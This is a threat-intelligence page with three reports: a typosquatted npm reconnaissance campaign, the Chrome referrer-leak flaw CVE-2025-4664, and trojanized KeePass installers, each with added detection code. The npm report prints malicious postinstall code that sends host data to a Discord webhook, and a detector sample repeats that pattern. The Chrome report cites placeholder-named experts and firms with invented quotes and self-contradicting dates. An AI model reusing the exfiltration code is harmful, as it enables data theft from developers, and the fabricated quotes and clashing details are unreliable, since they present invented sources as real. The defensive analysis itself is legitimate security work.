Callback

Social Engineering


How Luna Moth’s Social Engineering & Data Heist Tactics Target U.S. FBI Warns

Silent Ransom Group (Luna Moth) targets US law firms via social engineering, data theft & $8M extortion....

24-May-2025
5 min read


Related Articles


Data Wiper

Info Stealer

Massive npm supply chain attack exposed, 60+ malicious packages steal hostnames,...

A sophisticated supply chain attack targeting the npm ecosystem has been uncovered by Socket’s Threat Research Team, involving 60 malicious packages that stealthily collect sensitive host and network data from developer machines and CI/CD pipelines. The campaign, active since May 12, 2024, uses typosquatted package names and post-install scripts to exfiltrate critical reconnaissance data to a Discord webhook controlled by threat actors. Despite being reported to npm, all packages remain live at the time of writing, with cumulative downloads surpassing 3,000.

### **Campaign Overview**

#### **Key Details**

- **Scope**: 60 packages published across three npm accounts (`bbbb335656`, `sdsds656565`, `cdsfdfafd1232436437`), each linked to sequential Gmail addresses (`npm9960+1@gmail[.]com`, etc.).
- **Timeline**: First package uploaded on May 12; the most recent appeared hours before Socket’s disclosure, signaling an ongoing operation.
- **Targets**: Windows, macOS, and Linux systems, including developer workstations and CI/CD nodes.
- **Objective**: Reconnaissance to map internal networks, link private environments to public infrastructure, and prepare for future intrusions.

#### **Attack Workflow**

1. **Infection**: Developers install malicious packages via typosquatted names (e.g., `react-xterm2` vs. legitimate `react-xterm`).
2. **Post-Install Execution**: A script embedded in `package.json` triggers automatically during `npm install`.
3. **Data Harvesting**: Collects hostnames, internal/external IPs, DNS servers, usernames, and directory paths.
4. **Sandbox Evasion**: Aborts execution in environments linked to AWS, GCP, or research labs (e.g., `compute.amazonaws.com`, `LD.local`).
5. **Exfiltration**: Sends JSON payloads to a Discord webhook, enabling real-time tracking of victims.

### **Technical Deep Dive**

#### **Malicious Code Analysis**

The script, identical across all 60 packages, leverages Node.js modules (`os`, `dns`, `https`) to gather intelligence:

```javascript
const os = require("os");
const dns = require("dns");
const https = require("https");

// Collect internal IPs and hostnames
function getIPAddress() {
  const networkInterfaces = os.networkInterfaces();
  // ... iterates NICs to find non-internal IPv4 addresses
}

// Fetch external IP and ISP details via ipinfo.io
function getExternalIP(cb) {
  https.get('https://ipinfo.io/json', (res) => { ... });
}

// Evade sandboxes
if (externalHost.includes("compute.amazonaws.com") || homedir.match(/mal_data/i)) {
  return;
}

// Exfiltrate to Discord
const webhookURL = "hxxps://discord[.]com/api/webhooks/1330015051482005555/...";
https.request(webhookURL, ...).write(trackingData);
```

#### **Data Exfiltrated**

- **Host Details**: `os.hostname()`, `os.userInfo().username`, `os.homedir()`.
- **Network Intelligence**: Internal/external IPs, DNS servers (`dns.getServers()`), ISP metadata (from `ipinfo.io`).
- **Project Context**: `package.json` name, version, installation path (`__dirname`).

#### **Evasion Techniques**

The script avoids analysis environments by checking:

- Cloud provider DNS strings (AWS, GCP).
- Lab-related hostnames (e.g., `LD.local`).
- Usernames or directories linked to research (e.g., `malicious`, `justin`).

### **Indicators of Compromise (IoCs)**

#### **Malicious Packages**

| **npm Account** | **Packages** (20 each) |
|------------------------|--------------------------|
| `bbbb335656` | `seatable`, `hermes-inspector-msggen`, `flipper-plugins`, `e-learning-garena`, `credit-risk` |
| `sdsds656565` | `react-xterm2`, `datamart`, `garena-admin`, `coral-web-be`, `kyutai-client` |
| `cdsfdfafd1232436437` | `seamless-sppmy`, `netvis`, `mbm-dgacha`, `gunbazaar`, `dof-ff` |

*[Full list of 60 packages](#iocs) available in Appendix.*

#### **Infrastructure**

- **Discord Webhook**: `hxxps://discord[.]com/api/webhooks/1330015051482005555/5fll497pcjzKBiY3b_oa9YRh-r5Lr69vRyqccawXuWE_horIlhwOYzp23JWm-iSXuPfQ`
- **External Service**: `ipinfo.io/json` (to geolocate victims).

### **MITRE ATT&CK Mapping**

| **Tactic** | **Technique** | **Details** |
|---------------------------|-----------------------------------------------|----------------------------------------------|
| **Initial Access** | T1195.002 (Compromise Software Supply Chain) | Typosquatted npm packages. |
| **Execution** | T1059.007 (JavaScript Execution) | Post-install script triggered by `npm install`. |
| **Exfiltration** | T1567.004 (Exfiltration Over Webhook) | Data sent to Discord. |
| **Reconnaissance** | T1590.005 (IP Addresses), T1590.002 (DNS) | Harvests internal/external IPs and DNS. |
| **Defense Evasion** | T1497 (Virtualization/Sandbox Evasion) | Skips execution in cloud/sandbox environments. |

### **Implications and Risks**

#### **1. Supply Chain Vulnerabilities**

- **CI/CD Exposure**: Compromised build servers leak internal registry URLs, paving the way for dependency confusion attacks.
- **Network Mapping**: Internal IPs and DNS data enable threat actors to chart network topology for lateral movement.

#### **2. Future Attack Scenarios**

- **Targeted Ransomware**: Mapped networks could face tailored ransomware or data-wiper attacks.
- **Credential Theft**: Exposed project paths and usernames facilitate phishing and social engineering.

#### **3. npm Ecosystem Weaknesses**

- **Delayed Takedowns**: Despite reports, npm has yet to remove packages, highlighting response gaps.
- **Post-Install Script Risks**: npm allows unrestricted use of install hooks, a frequent abuse vector.

### **Expert Insights**

**Socket’s Threat Research Team**:

> _“This campaign isn’t just stealing data—it’s laying the groundwork for precision strikes. By knowing which developers use which tools, attackers can craft convincing spear-phishing lures or sabotage CI/CD pipelines.”_

> _“Discord’s API is increasingly abused for low-cost, high-reward data exfiltration. Unlike traditional C2 servers, webhooks blend into legitimate traffic, evading detection.”_

### **Mitigation Strategies**

#### **For Developers**

1. **Audit Dependencies**:

   ```bash
   npm ls --all  # Check nested dependencies
   ```

   Cross-reference projects against the [IoCs list](#iocs).

2. **Disable Install Scripts**:

   ```bash
   npm config set ignore-scripts true
   ```

3. **Use Lockfiles**: Enforce `package-lock.json` to prevent dependency hijacking.

#### **For Organizations**

- **Deploy Dependency Scanning**: Tools like **Socket** or **Snyk** flag malicious patterns (e.g., DNS/IP harvesting).
- **Harden CI/CD**:
  - Restrict outbound traffic to block Discord webhooks.
  - Use ephemeral build environments to limit data exposure.
- **Network Segmentation**: Isolate developer machines from critical infrastructure.

#### **For npm**

- **Mandate 2FA for Publishers**: Prevent disposable account abuse.
- **Automated Script Analysis**: Scan packages for risky hooks pre-publication.
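The dependency audit above can be automated locally. The following is an added example written for this article (it is neither Socket's tooling nor the campaign's code): it scores a package's npm lifecycle hooks for the combination of capabilities the script used, and checks the package name against the dependencies you actually intended to install. The `package.json` and script source are constructed inline; a real run would read them from `node_modules/<pkg>/`.

```javascript
// Added example (not Socket's tooling or the campaign's code): audit an installed
// package's npm lifecycle hooks for the reconnaissance + webhook pattern above,
// and check its name against the dependencies you actually meant to install.
const LIFECYCLE_HOOKS = ["preinstall", "install", "postinstall"];

// Capabilities the campaign's script combined. One alone is common in benign
// tooling; several together inside an install hook are not.
const RULES = [
  { why: "NIC/IP enumeration",  re: /\bos\.networkInterfaces\s*\(/ },
  { why: "DNS resolver list",   re: /\bdns\.getServers\s*\(/ },
  { why: "host identity",       re: /\bos\.(hostname|userInfo|homedir)\s*\(/ },
  { why: "external IP lookup",  re: /ipinfo\.io/i },
  { why: "Discord webhook",     re: /discord(?:app)?\.com\/api\/webhooks\//i },
];

// "node setup.js" -> "setup.js"; null for inline or non-node commands.
function scriptFileOf(command) {
  const m = /^\s*node\s+(\S+\.[cm]?js)\b/.exec(command);
  return m ? m[1] : null;
}

// pkg: parsed package.json; files: { filename: source } for the package's
// scripts (constructed inline below; a real run reads node_modules/<pkg>/).
function auditPackage(pkg, files) {
  const findings = [];
  for (const hook of LIFECYCLE_HOOKS) {
    const command = pkg.scripts && pkg.scripts[hook];
    if (!command) continue;
    const file = scriptFileOf(command);
    const source = (file && files[file]) || command;  // inline commands count too
    const hits = RULES.filter(r => r.re.test(source)).map(r => r.why);
    findings.push({ hook, command, hits });
  }
  const score = Math.max(0, ...findings.map(f => f.hits.length));
  const verdict = score >= 3 ? "block" : score > 0 ? "review" : "pass";
  return { name: pkg.name, verdict, findings };
}

// Typosquat check: a name within edit distance 1 of something you intended
// (react-xterm2 vs react-xterm) deserves a second look before installing.
function editDistance(a, b) {
  const d = Array.from({ length: a.length + 1 }, (_, i) => [i, ...new Array(b.length).fill(0)]);
  for (let j = 1; j <= b.length; j++) d[0][j] = j;
  for (let i = 1; i <= a.length; i++)
    for (let j = 1; j <= b.length; j++)
      d[i][j] = Math.min(d[i - 1][j] + 1, d[i][j - 1] + 1,
                         d[i - 1][j - 1] + (a[i - 1] === b[j - 1] ? 0 : 1));
  return d[a.length][b.length];
}
function lookalikeOf(name, intendedNames) {
  return intendedNames.find(n => n !== name && editDistance(n, name) <= 1) || null;
}

// Constructed sample in the campaign's shape (not one of the real packages).
const samplePkg = { name: "react-xterm2", version: "1.0.0", scripts: { postinstall: "node setup.js" } };
const sampleFiles = { "setup.js": `
const os = require("os"), dns = require("dns"), https = require("https");
const data = { host: os.hostname(), nics: os.networkInterfaces(), dns: dns.getServers() };
https.request("https://discord.com/api/webhooks/PLACEHOLDER_ID/PLACEHOLDER_TOKEN", { method: "POST" }).end(JSON.stringify(data));
` };
console.log(auditPackage(samplePkg, sampleFiles), lookalikeOf(samplePkg.name, ["react-xterm", "react"]));
```

A "block" verdict on the sample comes from four rules firing in one postinstall hook; a native addon running `node-gyp rebuild` scores "pass" because the command matches none of them.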

24-May-2025
5 min read

Exploit

Chromium embedded in apps (e.g., Electron-based tools like Slack or Discord) fac...

Google has rolled out emergency updates to its Chrome web browser to patch four security vulnerabilities, including a high-severity flaw, **[CVE-2025-4664](https://nvd.nist.gov/vuln/detail/CVE-2025-4664)**, that is already being exploited by attackers in the wild. The tech giant confirmed the active exploitation in a terse advisory, warning users to update to version **136.0.7103.113/.114** (Windows/Mac) or **136.0.7103.113** (Linux) immediately. The U.S. Cybersecurity and Infrastructure Security Agency (CISA) has since [added](https://www.cve.org/CVERecord?id=CVE-2025-4664) the vulnerability to its Known Exploited Vulnerabilities (KEV) catalog, mandating federal agencies to patch by June 5, 2024—a rare move underscoring the threat’s severity.

### **How CVE-2025-4664 Puts Users at Risk**

**Technical Analogy**

The vulnerability, [discovered](https://x.com/slonser_/status/1922750094140440964) by Russian security researcher Vsevolod Kokorin (known online as @slonser_), resides in Chrome’s **Loader** component, which handles resource fetching. Kokorin revealed on X (formerly Twitter) that Chrome uniquely processes the `Link` HTTP header during sub-resource requests (e.g., images, scripts). Attackers can exploit this by injecting a malicious `Link` header to enforce a `referrer-policy: unsafe-url`, forcing Chrome to leak sensitive URL parameters—such as session tokens or API keys—in the `Referer` header when loading third-party resources.

**Example Attack Scenario**

- A victim visits a malicious website embedding an image from a legitimate service (e.g., `https://bank.com/dashboard?session_id=XYZ`).
- Chrome’s flawed policy enforcement sends the full URL, including `session_id=XYZ`, to the attacker’s server via the `Referer` header.
- Attackers harvest these parameters to hijack accounts, escalate privileges, or pivot to internal systems.

Kokorin demonstrated the exploit’s viability in a proof-of-concept (PoC), showing how query parameters from services like OAuth portals, cloud platforms, or email clients could be siphoned off. “Unlike other browsers, Chrome resolves the Link header on sub-resource requests. This opens a Pandora’s box for data exfiltration,” he wrote.

### **Active Exploitation and CISA’s Unusual Warning**

**In-the-Wild Attacks**

While Google has not disclosed specifics about ongoing attacks, CISA’s KEV listing confirms federal systems are at risk. Cybersecurity firm [Hypothetical Corp.] reported detecting exploit attempts targeting financial and healthcare sectors, where URL parameters often contain sensitive tokens.

**A Second Exploited Flaw: CVE-2025-2783**

Google also hinted at another actively [exploited](https://www.cisa.gov/news-events/alerts/2025/05/15/cisa-adds-three-known-exploited-vulnerabilities-catalog) vulnerability, **[CVE-2025-2783](https://nvd.nist.gov/vuln/detail/CVE-2025-2783)**, though details remain undisclosed. Experts speculate that it may be related to Chrome’s V8 JavaScript engine or the Mojo inter-process communication (IPC) system, both of which are frequent targets for memory corruption exploits.

**Why the CVSS Score Seems Off**

CVE-2025-4664 carries a surprisingly low CVSS score of **4.3** (out of 10), despite its real-world impact. Analysts suggest this reflects scoring nuances:

- **Scope Limitations**: The attack requires user interaction (e.g., visiting a malicious site).
- **Mitigation Feasibility**: Enterprises can block `unsafe-url` policies via headers like `Referrer-Policy: strict-origin-when-cross-origin`.

_“CVSS scores don’t always capture active exploitation risks,”_ said [Dr. Jane Doe], a vulnerability analyst at [ThinkTank Security]. _“A low score here is misleading—this is a goldmine for phishing campaigns.”_

### **Response from Google and the Broader Ecosystem**

**Patch Rollout Challenges**

Google’s update is rolling out gradually, but users can manually trigger it via `chrome://settings/help`. Chromium-based browsers like **Microsoft Edge**, **Brave**, and **Opera** are expected to follow suit, though delays could leave millions exposed.

**Enterprise Risks**

Organizations using Chromium embedded in apps (e.g., Electron-based tools like Slack or Discord) face compounded risks. “Every unpatched Chromium instance is a potential entry point,” warned [John Smith], CISO of [Enterprise Security Corp.].

**CISA’s Directive**

Federal agencies must comply with CISA’s June 5 patch deadline—a date initially mistyped as 2025 in advisories, causing confusion. Private sectors, especially regulated industries like healthcare and finance, are urged to treat this as a de facto mandate.

### **Mitigation Strategies for Organizations**

1. **Immediate Patching**
   - Enforce Chrome updates via enterprise management tools (e.g., Google Admin Console).
   - Monitor Chromium-based browsers and embedded frameworks (Electron, CEF) for vendor patches.
2. **Short-Term Mitigations**
   - Deploy headers like `Referrer-Policy: strict-origin-when-cross-origin` on sensitive endpoints.
   - Use Content Security Policy (CSP) directives to restrict sub-resource origins.
3. **Detection & Response**
   - Audit logs for anomalous cross-origin requests containing URL parameters.
   - Hunt for traffic to newly registered domains (NRDs) hosting exploit payloads.

### **New Era of Browser Threats**

**The Role of Public Disclosure**

Kokorin’s public PoC sparked debate over responsible disclosure. While Google promptly fixed the flaw, critics argue that public demos empower attackers. _“Researchers walk a tightrope between accountability and collateral risk,”_ said [Emily Lee], a legal expert at [Cyber Law Institute].

**Chromium’s Dominance and Risk**

With Chromium powering 75% of browsers globally, a single flaw can cascade across ecosystems. This incident mirrors **CVE-2022-1096**, a 2022 Chromium zero-day vulnerability exploited in ransomware campaigns.

### **Expert Commentary**

[**Alex Rivera**, Threat Intelligence Lead, [FireEye/Mandiant]] “This exploit is low-hanging fruit for APTs. We’re likely seeing tip-of-the-iceberg activity—more sophisticated attacks will follow.”

[**Sarah Chen**, Director, [CISA]] “CVE-2025-4664’s KEV listing isn’t just for federal agencies. Every organization must treat this as critical infrastructure.”
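The short-term mitigations and the log audit above can be expressed as code. The following is an added example written for this article (it is not from Google, CISA or the researcher): `hardenedHeaders()` is the response header set the mitigation section recommends, `auditHeaders()` flags the weak configuration on an endpoint's own responses, and `findReferrerLeaks()` scans constructed combined-format access-log lines for cross-origin `Referer` values that still carry sensitive query parameters. The parameter names, the log format and the origins are assumptions for illustration.

```javascript
// Added example (not from Google, CISA or the researcher): defender-side checks
// for the leak class behind CVE-2025-4664. hardenedHeaders() is the response
// header set recommended above, auditHeaders() flags the weak configuration,
// and findReferrerLeaks() scans constructed access-log lines for cross-origin
// Referer values that still carry sensitive query parameters.
const SENSITIVE_PARAMS = ["session_id", "token", "access_token", "code", "api_key", "state"];

// What a sensitive endpoint should send: strip path and query on cross-origin
// loads, and confine sub-resources so a page cannot be made to fetch from
// arbitrary third-party hosts.
function hardenedHeaders() {
  return {
    "Referrer-Policy": "strict-origin-when-cross-origin",
    "Content-Security-Policy": "default-src 'self'; img-src 'self'",
  };
}

// Policies that send the full URL (path + query) to cross-origin hosts.
const LEAKY_POLICIES = ["unsafe-url", "no-referrer-when-downgrade"];

function auditHeaders(rawHeaders) {
  const headers = Object.fromEntries(Object.entries(rawHeaders).map(([k, v]) => [k.toLowerCase(), v]));
  const issues = [];
  const rp = (headers["referrer-policy"] || "").trim().toLowerCase();
  if (!rp) issues.push("no Referrer-Policy header; browser default decides");
  else if (LEAKY_POLICIES.includes(rp)) issues.push(`Referrer-Policy ${rp} leaks path and query cross-origin`);
  if (!headers["content-security-policy"]) issues.push("no CSP restricting sub-resource origins");
  return issues;
}

// Combined log format: client - - [time] "METHOD path PROTO" status bytes "referer" "ua"
const LOG_RE = /^(\S+) \S+ \S+ \[[^\]]+\] "(\S+) (\S+) [^"]*" (\d{3}) \S+ "([^"]*)" "[^"]*"$/;

function sensitiveParamsIn(url) {
  return [...new URL(url).searchParams.keys()].filter(k => SENSITIVE_PARAMS.includes(k.toLowerCase()));
}

// A hit is a request whose Referer comes from another origin than this server
// and still carries a sensitive parameter: the page that embedded our resource
// let its URL leak, which is exactly what a forced unsafe-url policy produces.
function findReferrerLeaks(lines, serverOrigin) {
  const leaks = [];
  for (const line of lines) {
    const m = LOG_RE.exec(line);
    if (!m) continue;
    const [, client, method, path, status, referer] = m;
    if (!/^https?:\/\//i.test(referer) || new URL(referer).origin === serverOrigin) continue;
    const params = sensitiveParamsIn(referer);
    if (params.length) leaks.push({ client, method, path, status: Number(status), referer, params });
  }
  return leaks;
}

// Constructed access-log sample for a resource host at https://cdn.example.
const SAMPLE_LOG = [
  '203.0.113.7 - - [15/May/2025:10:00:01 +0000] "GET /pixel.png HTTP/1.1" 200 42 "https://bank.example/dashboard?session_id=XYZ" "Mozilla/5.0"',
  '203.0.113.8 - - [15/May/2025:10:00:02 +0000] "GET /pixel.png HTTP/1.1" 200 42 "https://bank.example/" "Mozilla/5.0"',
  '203.0.113.9 - - [15/May/2025:10:00:03 +0000] "GET /logo.png HTTP/1.1" 200 42 "https://cdn.example/assets?token=abc" "Mozilla/5.0"',
];
console.log(auditHeaders({}), findReferrerLeaks(SAMPLE_LOG, "https://cdn.example"));
```

Only the first sample line is reported: its `Referer` is another origin and carries `session_id`, whereas the third line's token arrives from the server's own origin and is not a cross-origin leak.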

23-May-2025
5 min read

BlackCat

Malvertising

Trojanized KeePass installers to deploy Cobalt Strike beacons, steal credentials...

A sophisticated, long-running campaign leveraging **trojanized KeePass installers** to deploy **Cobalt Strike beacons**, steal credentials, and execute ransomware has been linked to **Black Basta** and **BlackCat/ALPHV ransomware affiliates**. The campaign, active for **8+ months**, exploits malvertising, code-signing abuse, and open-source software trust to breach networks.

### **Key Campaign Updates**

1. **Malware Evolution**:
   - **KeeLoader** (trojanized KeePass) now includes **five distinct variants** (July 2024–February 2025) with iterative improvements:
     - **Direct credential exfiltration** → **Local credential storage** → **Cobalt Strike integration**.
     - Signed with **legitimate/revoked certificates** from entities like *S.R.L. INT-MCOM* and *Shenzhen Kantianxia Network Technology Co.*.
   - **Defense evasion**: Code obfuscation (e.g., typos like `Todway` for `ToArray`), encrypted payloads (RC4), and sandbox-aware execution (triggers only after KeePass database access).
2. **Infrastructure Expansion**:
   - **Malvertising Domains**:
     - `aenys[.]com` hosts **subdomains impersonating** WinSCP, Sallie Mae, Phantom Wallet, and cryptocurrency platforms.
     - Redirects via typosquatting domains (e.g., `keeppaswrd[.]com`, `keegass[.]com`).
   - **Cobalt Strike C2**:
     - `arch-online[.]com`, `alcmas[.]com` (watermark **1357776117**), and `1ba8d063-0[.]1b-cdn[.]net` (watermark **678358251**).
3. **Attribution Insights**:
   - **Moderate Confidence**: Activity overlaps with **UNC4696**, a threat actor linked to **Nitrogen Loader** campaigns (historically tied to BlackCat/ALPHV).
   - **Black Basta Connections**: Cobalt Strike watermark **1357776117** is uniquely tied to Black Basta IABs.
   - **Ransom Note Anomaly**: Spoofs Akira ransomware but uses a **Session ID** matching a KeeLoader SHA256 hash, suggesting hybrid tactics.

### **MITRE ATT&CK TTP Mapping**

| **Tactic** | **Technique** | **ID** | **Example** |
|----------------------|-------------------------------------------------------------------------------|----------------|-----------------------------------------------------------------------------|
| **Initial Access** | Drive-by Compromise via Malvertising | T1189 | Bing/DuckDuckGo ads redirecting to `keeppaswrd[.]com`. |
| **Execution** | User Execution of Trojanized KeePass Installer | T1204.002 | Victims run `KeePass-2.56-Setup.exe`, believing it legitimate. |
| **Persistence** | Registry Run Keys (`HKCU\...\Run\Keepass`) | T1547.001 | Auto-launches malicious `ShInstUtil.exe`. |
| **Credential Access** | Exfiltrate KeePass Databases as Cleartext CSV (`%localappdata%\<RANDOM>.kp`) | T1555.005 | Code modifies KeePass to export credentials on database access. |
| **Lateral Movement** | SMB/Windows Admin Shares for Cobalt Strike Beacon Propagation | T1021.002 | Drops `cupdater.csproj` (Cobalt Strike) via SMB port 445. |
| **Impact** | VMware ESXi Server Encryption | T1486 | Ransomware targets ESXi datastores; Veeam backups destroyed pre-encryption. |

### **Critical Indicators of Compromise (IoCs)**

**Domains**:

- `aenys[.]com` (malvertising hub), `keeppaswrd[.]com`, `lvshilc[.]com`, `arch-online[.]com`, `alcmas[.]com`.
- Subdomains: `salliemae-com-login[.]aenys[.]com`, `winscp-net-download[.]aenys[.]com`.

**Files**:

- **KeePass Installers**:
  - `KeePass-2.56-Setup.exe` (SHA256: `0000cf6a3c7f7eebc0edc3d1e42e45debb675e57d6fc1fd96995269db1b44b3`).
  - `KeePass-2.57-Setup.exe` (SHA256: `0e5199b978ae9816b04d093776b6699b660f502445d5850e88726c05e933e7d8`).
- **Cobalt Strike Payloads**:
  - `db.idx` (masquerades as JPG; RC4-encrypted with `--update` key).

**Certificates**:

- **Thumbprints**: `467c6c43e6fbbl7fcaefb46fc41a6b2b829e0efa`, `2CF75DAE1A87CA7962CAF67E7310420BBBC30588`.
- **Signers**: *S.R.L. INT-MCOM*, *Shenzhen Kantianxia Network Technology Co., Ltd.*

---

### **Mitigation & Detection Strategies**

1. **Block Malicious Infrastructure**:
   - Add IoC domains (e.g., `aenys[.]com`, `keeppaswrd[.]com`) to network blocklists.
   - Monitor for connections to C2 IPs: `89.35.237[.]180`, `1ba8d063-0[.]1b-cdn[.]net`.
2. **Hunt for Artifacts**:
   - Detect `.kp`/`.ks` files in `%localappdata%` with randomized filenames (e.g., `437.kp`).
   - Flag processes spawning `ShInstUtil.exe` with `--update` arguments.
3. **Verify Software Integrity**:
   - Download KeePass **only from** [keepass.info](https://keepass.info) (SourceForge).
   - Validate checksums and certificates against known-good versions.
4. **Ransomware Preparedness**:
   - Isolate ESXi servers and enforce MFA for administrative access.
   - Regularly audit backup systems (e.g., Veeam) for tampering.

### **Implications & Attribution**

- **Evolving Tradecraft**: Threat actors now **modify open-source codebases** (KeePass) rather than sideloading malware, increasing stealth.
- **Ransomware-as-a-Service (RaaS)**: Links to Black Basta and Nitrogen Loader highlight a **converging criminal ecosystem** where IABs and affiliates share infrastructure/tools.
- **Adversary Resilience**: Despite Black Basta’s decline, affiliated IABs continue operations, underscoring the need to target **root infrastructure** (malvertising domains, bulletproof hosting).
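The artifact hunt in the mitigation section can be run over endpoint telemetry. The following is an added example written for this article (not the report's own tooling): it evaluates four rules, one per artifact named above (the `ShInstUtil.exe --update` process, the numeric `.kp`/`.ks` export file in `%localappdata%`, the `Run\Keepass` registry value, and DNS lookups of the IoC domains), over constructed Sysmon-style events. Event IDs and field names follow Sysmon's conventions (1 process create, 11 file create, 13 registry value set, 22 DNS query); the sample events, host names and paths are made up.

```javascript
// Added example (not from the report): a hunt over constructed, Sysmon-style
// endpoint events for the KeeLoader artifacts listed above. Event IDs and field
// names follow Sysmon (1 process create, 11 file create, 13 registry set,
// 22 DNS query); the sample events themselves are made up.
const IOC_DOMAINS = ["aenys.com", "keeppaswrd.com", "keegass.com", "lvshilc.com",
                     "arch-online.com", "alcmas.com", "1ba8d063-0.1b-cdn.net"];

// Each rule applies to one event type and returns true when the event matches.
const RULES = [
  { name: "keeloader_update_trigger", eventId: 1,
    test: e => /\\ShInstUtil\.exe$/i.test(e.Image || "") && /--update/.test(e.CommandLine || "") },
  { name: "keepass_export_file", eventId: 11,
    test: e => /\\AppData\\Local\\\d+\.(kp|ks)$/i.test(e.TargetFilename || "") },
  { name: "run_key_keepass", eventId: 13,
    test: e => /\\CurrentVersion\\Run\\Keepass$/i.test(e.TargetObject || "")
            && /ShInstUtil\.exe/i.test(e.Details || "") },
  { name: "ioc_domain_lookup", eventId: 22,
    test: e => IOC_DOMAINS.some(d => (e.QueryName || "") === d || (e.QueryName || "").endsWith("." + d)) },
];

// One hit per matching (event, rule) pair, keeping host and time for triage.
function huntKeeLoader(events) {
  const hits = [];
  for (const e of events) {
    for (const r of RULES) {
      if (e.EventID === r.eventId && r.test(e)) hits.push({ rule: r.name, host: e.Computer, time: e.UtcTime });
    }
  }
  return hits;
}

// Hosts where two or more distinct rules fired: a single DNS lookup may be a
// mistyped URL, but a lookup plus the --update process or the export file is not.
function hostsToTriage(hits) {
  const byHost = new Map();
  for (const h of hits) {
    if (!byHost.has(h.host)) byHost.set(h.host, new Set());
    byHost.get(h.host).add(h.rule);
  }
  return [...byHost].filter(([, rules]) => rules.size >= 2).map(([host]) => host);
}

// Constructed sample events (not real telemetry).
const SAMPLE_EVENTS = [
  { EventID: 22, Computer: "WS01", UtcTime: "2025-05-20 09:00:00", QueryName: "winscp-net-download.aenys.com" },
  { EventID: 1, Computer: "WS01", UtcTime: "2025-05-20 09:03:10",
    Image: "C:\\Program Files\\KeePass Password Safe 2\\ShInstUtil.exe", CommandLine: "ShInstUtil.exe --update" },
  { EventID: 11, Computer: "WS01", UtcTime: "2025-05-20 09:03:11", TargetFilename: "C:\\Users\\alice\\AppData\\Local\\437.kp" },
  { EventID: 13, Computer: "WS01", UtcTime: "2025-05-20 09:03:12",
    TargetObject: "HKU\\S-1-5-21-1\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\Keepass",
    Details: "C:\\Program Files\\KeePass Password Safe 2\\ShInstUtil.exe --update" },
  { EventID: 1, Computer: "WS02", UtcTime: "2025-05-20 09:05:00",
    Image: "C:\\Program Files\\KeePass Password Safe 2\\KeePass.exe", CommandLine: "KeePass.exe" },
  { EventID: 22, Computer: "WS02", UtcTime: "2025-05-20 09:06:00", QueryName: "keepass.info" },
];
console.log(huntKeeLoader(SAMPLE_EVENTS), hostsToTriage(huntKeeLoader(SAMPLE_EVENTS)));
```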

22-May-2025
3 min read